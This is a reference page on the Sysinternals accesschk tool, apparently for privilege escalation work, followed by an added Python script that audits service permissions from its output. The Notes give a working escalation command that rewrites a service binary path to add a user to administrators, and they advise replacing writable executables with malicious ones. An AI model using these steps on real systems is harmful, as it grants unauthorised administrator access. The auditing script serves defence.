accesschk
Description
Sysinternals tool used to check permissions on files, directories, services, and registry keys on Windows systems. It is essential for identifying privilege escalation vectors such as writable services, writable executables, and weak permissions on autorun programs.
Usage 1: Find All Services Writable by Everyone
List all services where the "Everyone" group has write access. This helps identify services whose configuration can be modified for privilege escalation.
Command:
accesschk64.exe -uwcv Everyone *
Flags:
- -u: suppress errors
- -w: show objects with write access
- -c: show services
- -v: verbose output
Usage 2: Check Permissions on a Specific Service
Check the permissions on a specific service (e.g., daclsvc) to see if the current user can modify its configuration.
Command:
accesschk64.exe -uwcv daclsvc
Usage 3: Check Write Access on a File or Directory
Check if the current user has write access to a specific file or directory. Useful for identifying writable executables or autorun programs.
Command:
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
Usage 4: Check Permissions on Autorun Program Directory
Verify if you have write access to an autorun program's directory, which can be abused by replacing the executable with a malicious one.
Command:
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
Notes
- Part of the Sysinternals suite from Microsoft.
- After confirming write access to a service with SERVICE_CHANGE_CONFIG, the binary path can be changed: sc config daclsvc binpath="net localgroup administrators user /add"
- After confirming write access to an executable, replace it with a malicious binary and restart the service.
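For auditing the condition described in Usage 2 and the Notes, the following added example (not part of the original page and not Sysinternals code) parses the verbose output for one service and reports principals outside a trusted set that hold rights allowing the service to be reconfigured. The sample output is constructed, and the output layout, the TRUSTED list and the DANGEROUS set are assumptions to adapt to local policy.

```python
import re

# Rights that let a principal reconfigure or take over a service (assumed policy).
DANGEROUS = {"SERVICE_CHANGE_CONFIG", "SERVICE_ALL_ACCESS", "WRITE_DAC", "WRITE_OWNER"}
# Principals expected to hold full control (assumption: adjust per environment).
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
           "NT SERVICE\\TrustedInstaller"}

ACE_RE = re.compile(r"^\s+(R|W|RW)\s+(\S.*)$")    # e.g. "  RW Everyone"
RIGHT_RE = re.compile(r"^\s+([A-Z][A-Z_]+)\s*$")  # e.g. "\tSERVICE_START"

# Constructed sample of `accesschk64.exe -uwcv daclsvc` output (assumed layout).
SAMPLE = """daclsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
\tSERVICE_ALL_ACCESS
  RW BUILTIN\\Administrators
\tSERVICE_ALL_ACCESS
  RW Everyone
\tSERVICE_QUERY_STATUS
\tSERVICE_QUERY_CONFIG
\tSERVICE_CHANGE_CONFIG
\tSERVICE_START
\tSERVICE_STOP
\tREAD_CONTROL
"""

def parse_service_acl(text):
    """Return (service, {principal: set(rights)}) for one service's output."""
    service, acl, current = None, {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():              # unindented line: service name
            service, current = line.strip(), None
        elif (m := ACE_RE.match(line)):        # new ACE: start a rights set
            current = acl.setdefault(m.group(2).strip(), set())
        elif (m := RIGHT_RE.match(line)) and current is not None:
            current.add(m.group(1))            # right belonging to current ACE
    return service, acl

def risky_aces(text):
    """List (service, principal, right) where an untrusted principal holds a dangerous right."""
    service, acl = parse_service_acl(text)
    return sorted((service, who, right)
                  for who, rights in acl.items() if who not in TRUSTED
                  for right in rights & DANGEROUS)

if __name__ == "__main__":
    for svc, who, right in risky_aces(SAMPLE):
        print(f"{svc}: {who} holds {right}; restrict the service DACL")
```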